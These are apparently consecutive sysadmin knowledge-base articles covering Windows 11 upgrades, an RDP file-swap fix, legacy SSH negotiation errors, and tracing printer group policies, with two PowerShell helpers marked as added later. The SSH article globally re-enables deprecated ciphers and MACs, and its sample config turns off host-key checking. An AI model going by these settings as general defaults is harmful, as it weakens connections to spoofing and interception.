Software Compatibility

Check whether your existing software and drivers are compatible with Windows 11. Vendors are gradually releasing updates, but some legacy applications may not work as expected.

Backup your Data

Before upgrading, ensure all critical data is backed up to an external drive or cloud storage. While most upgrades are seamless, it’s better to err on the side of caution.

Upgrade Timing

For businesses, avoid upgrading during peak operational periods. Test Windows 11 on a subset of systems before a full rollout.

Licensing and Cost

If you have a valid Windows 10 license, the upgrade to Windows 11 is free. However, organizations with volume licensing may need to verify their agreements.

Upgrade Paths from Windows 10 to Windows 11

Option 1: In-Place Upgrade Windows 10 to Windows 11

An in-place upgrade allows you to install Windows 11 over your existing Windows 10 installation without losing data or applications.

Steps:

  1. Run the PC Health Check Tool to ensure compatibility.
  2. Open Windows Update (“Settings > Update & Security”).
  3. If your device is eligible, you’ll see the option to upgrade to Windows 11. Click “Download and Install.”

Option 2: Clean Installation Upgrade Windows 10 to Windows 11

A clean installation is a fresh start, which often results in better performance and fewer compatibility issues.

Steps:

  1. Download the Windows 11 installation media from the Microsoft website.
  2. Create a bootable USB drive using the Media Creation Tool.
  3. Boot from the USB drive and follow the on-screen instructions to install Windows 11.
  4. Restore your data and reinstall applications.

Option 3: Upgrade via IT Deployment Tools (Enterprise)

Organisations can use tools like Microsoft Endpoint Manager or Windows Autopilot to deploy Windows 11 to multiple devices seamlessly.

Steps:

  1. Assess hardware readiness using tools like Microsoft Endpoint Configuration Manager.
  2. Develop an upgrade strategy, including phased rollouts and testing.
  3. Use deployment tools to push the upgrade to target systems.

Upgrade Windows 10 to Windows 11 (Post deployment Checks)

  • Verify Drivers and Updates: After installation, check for driver updates via Windows Update or manufacturer’s websites.
  • Reconfigure Software: Test all critical applications to ensure they work correctly.
  • Enable New Features: Familiarize yourself and your team with productivity features like Snap layouts and widgets.
  • Educate Users: Provide training or resources for end-users transitioning to Windows 11.

With support for Windows 10 ending soon, transitioning to Windows 11 is essential to ensure your system remains secure and up-to-date. By planning carefully and understanding the upgrade paths, you can make the process as smooth as possible. Start by assessing your hardware and software readiness, then choose the upgrade route that best fits your needs.

Related Articles, References, Credits, or External Links

NA

RDP Issue Post Windows 11 24H2 Upgrade

RDP Issue KB ID 0001901

Problem: RDP Issue

After updating Windows 11 to version 24H2, remote desktop connections to older systems (e.g., those running Windows 7 or Windows Server 2008 R2) have issues displaying graphical content properly.

Reverting to the earlier version of Windows 11 RDP (23H2) does resolve the issue.

Connections to devices with newer operating systems remain unaffected.

Solution: RDP Issue

Note: You can simply use the RDP client from the MS Store, and this should eliminate the problem.

The solution involves copying files from an older (23H2 or older) version of Windows, but first locate all the following files and RENAME them with a .OLD extension. To do this you will need to boot into Safe Mode, or from the recovery environment (press and hold the Shift key while clicking Restart from the Start menu, Power menu, or the sign-in screen; the computer will then reboot and enter Recovery Mode).

  • C:\Windows\System32\mstsc.exe
  • C:\Windows\System32\mstscax.dll
  • C:\Windows\System32\en-US\mstsc.exe.mui (en-US: your locale folder may be different if you are not using English US)
  • C:\Windows\System32\en-US\mstscax.dll.mui (en-US: your locale folder may be different if you are not using English US)
  • C:\Windows\SystemResources\mstsc.exe.mun
  • C:\Windows\SystemResources\mstscax.dll.mun

Copy those files back from a known working older system.

Related Articles, References, Credits, or External Links

NA

Windows SSH ‘No Matching Key’

No Matching Key KB ID 0001900

Problem : No Matching Key

Typically I see this problem on my mac or within various Linux distributions. I’ve covered extensively how to fix this on a mac in the following article.

macOS – SSH Error ‘No Matching Exchange Method Found’

So when I saw the same question asked for a Windows client, I went and looked, and found some patchy information, so I thought I’d work it out and post it here for you. Essentially you will see an error when attempting to SSH to a device something like one of the following.

Unable to negotiate with {IP-Or-Hostname} port 22 : no matching key exchange method found. Their offer: diffie-hellman-group1-sha1

Unable to negotiate with {IP-Or-Hostname} port 22 : no matching host key type found. Their offer: ssh-rsa

Solution : No Matching Key

With Windows the fix is similar: less secure algorithms and ciphers have been deprecated by Windows, and to re-enable them* you need to edit your ssh_config file. This file lives in a folder called ssh, which is in a hidden folder on the root of your C: drive called ProgramData. On most Windows machines this file won’t exist, but check first to make sure (particularly if you’re on a server that may be running SSH services).

*Note: They are deprecated for a reason; this weakens your machine’s security. The following procedure will GLOBALLY allow these deprecated ciphers for all SSH sessions; if you want to operate a little more securely, go to the individual SSH config section.

Showing Hidden Files and Folders : No Matching Key

Assuming, like me, you don’t already have an ssh_config file, then you need to create one and add the connection algorithms required. Open an administrative command window (if you don’t do this you will get access denied errors going forward!), then execute the following commands.

[box]

copy nul > C:\ProgramData\ssh\ssh_config

notepad C:\ProgramData\ssh\ssh_config

[/box]

Note: If after you execute the first command, you get “copy : Cannot find path ‘C:\Windows\system32\nul’ because it does not exist.” don’t worry, it will still create the file.

A Notepad window will open; remove any text within it and paste in the following.

[box]

MACs hmac-sha1,hmac-md5,hmac-sha1-96,hmac-md5-96,hmac-sha2-256,hmac-sha2-512
KexAlgorithms diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha1
PubkeyAcceptedAlgorithms +ssh-rsa
HostKeyAlgorithms +ssh-rsa

[/box]

Save the notepad file then re-try your ssh command, this time it should succeed, or if it errors it will tell you which MAC, KexAlgorithms, or Key algorithm it’s missing that you can paste into the ssh_config file.

Individual Host SSH Settings

It’s considered better practice to have a config for each target you will SSH to; for me that’s impractical because I have hundreds of clients and thousands of switches, routers and firewalls (but you could add them as you go, I suppose). For this procedure you create a config file in your user profile, and in that config file you put the requirements in on a host-by-host basis.

Firstly create the config file, open an administrative PowerShell window, and execute the following command.

[box]

New-Item -Path $HOME\.ssh\config -ItemType File

[/box]

Then to edit the config file.

[box]

C:\WINDOWS\System32\notepad.exe $HOME\.ssh\config

[/box]

A Notepad window will open with the blank config file, here’s an example of a config for two devices (my test Cisco ASA, and my test core switch).

Example.

[box]

# Config for my test firewall
Host cisco-asa
  HostName 192.168.254.254
  User petelong
  Port 22
  StrictHostKeyChecking no
  UserKnownHostsFile /dev/null
  KexAlgorithms diffie-hellman-group1-sha1
  HostKeyAlgorithms +ssh-rsa

[/box]

Now simply issue an ssh cisco-asa command.
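If you would rather not hand-edit the file for every device, the following added example (not from the original article) turns the “Unable to negotiate … Their offer: X” error text into a per-host entry in $HOME\.ssh\config that re-enables only the one algorithm the device offers, instead of the global list earlier in the article. The alias, address, user and error text are constructed sample values; unlike the example config above it deliberately writes no StrictHostKeyChecking or UserKnownHostsFile lines, so a changed host key is still reported.

```powershell
# Added example: generate a minimal per-host ssh config entry from the OpenSSH negotiation error.
function Add-LegacySshHost {
    param(
        [Parameter(Mandatory)][string]$Alias,
        [Parameter(Mandatory)][string]$HostName,
        [Parameter(Mandatory)][string]$ErrorText,
        [string]$User,
        [int]$Port = 22,
        [string]$ConfigPath = (Join-Path $HOME '.ssh\config')
    )
    # Map the wording in the OpenSSH error to the ssh_config keyword that controls it
    $keywordFor = @{
        'key exchange method' = 'KexAlgorithms'
        'host key type'       = 'HostKeyAlgorithms'
        'cipher'              = 'Ciphers'
        'MAC'                 = 'MACs'
    }
    if ($ErrorText -notmatch 'no matching (key exchange method|host key type|cipher|MAC) found\. Their offer: (\S+)') {
        throw "Error text does not look like an OpenSSH negotiation failure: $ErrorText"
    }
    $keyword = $keywordFor[$Matches[1]]
    $offered = $Matches[2]          # may be a comma-separated list; passed through as-is

    # Create the file if needed, but never append a second block for the same alias
    if (-not (Test-Path $ConfigPath)) { New-Item -Path $ConfigPath -ItemType File -Force | Out-Null }
    $existing = Get-Content -Path $ConfigPath -Raw -ErrorAction SilentlyContinue
    $aliasPattern = '(?m)^Host\s+' + [regex]::Escape($Alias) + '\s*$'
    if ($existing -and $existing -match $aliasPattern) {
        throw "Host $Alias already has an entry in $ConfigPath; edit it instead"
    }

    # '+' appends to the client's default list rather than replacing it, so only this host is weakened
    $block = "`nHost $Alias`n    HostName $HostName`n    Port $Port`n"
    if ($User) { $block += "    User $User`n" }
    $block += "    $keyword +$offered`n"
    Add-Content -Path $ConfigPath -Value $block
    $block
}

# Constructed sample: the first error from the Problem section, for a hypothetical switch
$err = 'Unable to negotiate with 192.168.1.10 port 22: no matching key exchange method found. Their offer: diffie-hellman-group1-sha1'
Add-LegacySshHost -Alias core-switch -HostName 192.168.1.10 -User admin -ErrorText $err
```

Afterwards `ssh core-switch` uses the legacy key exchange for that one host while every other connection keeps the default algorithm list.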

 

Related Articles, References, Credits, or External Links

SSH: Host Identification Has Changed

Printers “Some Of These Settings are Managed By Your Organisation”

Managed By Your Organisation KB ID 0001899

Problem

When attempting to add a printer, or engage with the printer settings dialog, you may see:

Some Of These Settings are Managed By Your Organisation

Solution : Managed By Your Organisation

This is usually because a policy is being applied (or has been applied) that changes the following key in your registry.

[box]

HKEY_CURRENT_USER > Software > Microsoft > Windows > CurrentVersion > Policies > Explorer > NoAddPrinter

[/box]

Values are:

  • ENABLED  = 1 (Printers cannot be added).
  • DISABLED = 0 (Printers can be added).

Of course, if this IS being enforced by group policy, changing the registry key will only fix the problem until the policy is reapplied!

I’ve previously written about how to locate where a group policy is coming from. The policy you are looking for is:

[box]

User Configuration > Administrative Templates > Control Panel > Printers > Prevent addition of printers

[/box]

In this case it was being enforced by Local User Policies.

Running gpedit.msc got me to the culprit.

If yours is being enforced from your domain, gpresult will point to the correct policy.

Related Articles, References, Credits, or External Links

Allow Users to Install Printers with Group Policy

Deploying Printers with Group Policy Preferences

What GPO are Applied?

What GPO KB ID 0001898

Problem

There are a number of reasons for you to test and demonstrate group policy application. Recently on Experts Exchange there was a question where a user could not add a printer because those settings were “Controlled by their organisation”, but they were pretty sure no printer GPOs were applied.

Or you may simply be setting up a new GPO and it’s not applying, or not working as you would expect.

Solution : What GPO

I’ve been doing this a long time! Back in the day you could create a new MMC console (run mmc.exe), then add the “Resultant Set Of Policy” snap-in and run that to evaluate and model different GPO applications and results. You can still do that, but now you can simply run the RSOP command from an administrative command window.

In this case it will produce a list of applied group policies for the logged-in user and the machine it was run on (if you want results for different users or computers you can add the RSOP snap-in to mmc, or run the modelling from a machine that has the Group Policy Management Console installed).

RSOP will give you output like this: you can see what policies are being applied, and the name of the group policy that is applying each change.

But this will produce a complete list of all GPO settings and their status (even if they are not defined, see above). An easier way to search is to use GPRESULT and send its output to an HTML file that you can open in a browser.

[box]

gpresult /h C:\{Path}\GPresult.htm

[/box]

This produces an easier to read report.

You can get the same report, and change the input parameters for users and computers etc., by running the Group Policy Results wizard that is included with the AD DS RSAT tools.
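Tying this article to the printers one above it, here is an added example (not from the original articles) that reads the NoAddPrinter value from the user and machine policy keys, runs the same gpresult /h report, and then searches the HTML for the “Prevent addition of printers” setting to name the GPO applying it. The report path is a constructed sample location, and the HTML parsing assumes the setting name, its state and the winning GPO sit in adjacent table cells of the report (if the layout differs, open the report in a browser and search by hand).

```powershell
# Added example: trace the NoAddPrinter restriction back to its group policy source.
function Get-PrinterRestrictionSource {
    param([string]$ReportPath = (Join-Path $env:TEMP 'GPresult.htm'))

    # The user key is the one the printers article names; the machine key is the equivalent HKLM policy location
    $hives = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer',
             'HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer'
    $registry = foreach ($key in $hives) {
        $value = (Get-ItemProperty -Path $key -Name NoAddPrinter -ErrorAction SilentlyContinue).NoAddPrinter
        [pscustomobject]@{ Key = $key; NoAddPrinter = $value; Enforced = ($value -eq 1) }
    }

    # Same report as the article's gpresult /h command; /f overwrites an older copy
    & gpresult.exe /h $ReportPath /f | Out-Null
    $html = Get-Content -Path $ReportPath -Raw

    # Assumption about the report layout: <td>setting</td><td>Enabled|Disabled</td><td>Winning GPO</td>
    $setting = 'Prevent addition of printers'
    $pattern = '(?s)' + [regex]::Escape($setting) + '.*?<td[^>]*>(Enabled|Disabled)</td>\s*<td[^>]*>([^<]+)</td>'
    $source = $null
    if ($html -match $pattern) {
        $source = [pscustomobject]@{ Setting = $setting; State = $Matches[1]; WinningGPO = $Matches[2].Trim() }
    }

    [pscustomobject]@{ Registry = $registry; PolicySource = $source; Report = $ReportPath }
}

$r = Get-PrinterRestrictionSource
$r.Registry | Format-Table -AutoSize
if ($r.PolicySource) {
    $r.PolicySource | Format-List
} else {
    "Setting not found in $($r.Report); open it in a browser and search for 'Prevent addition of printers'."
}
```

A value of 1 with no winning GPO in the report points at a local policy (gpedit.msc) or a direct registry change rather than a domain GPO.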

Related Articles, References, Credits, or External Links

Group Policy: Item-Level Targeting

Apply Group Policy To a Security Group

Add The ‘Group Policy Management Console’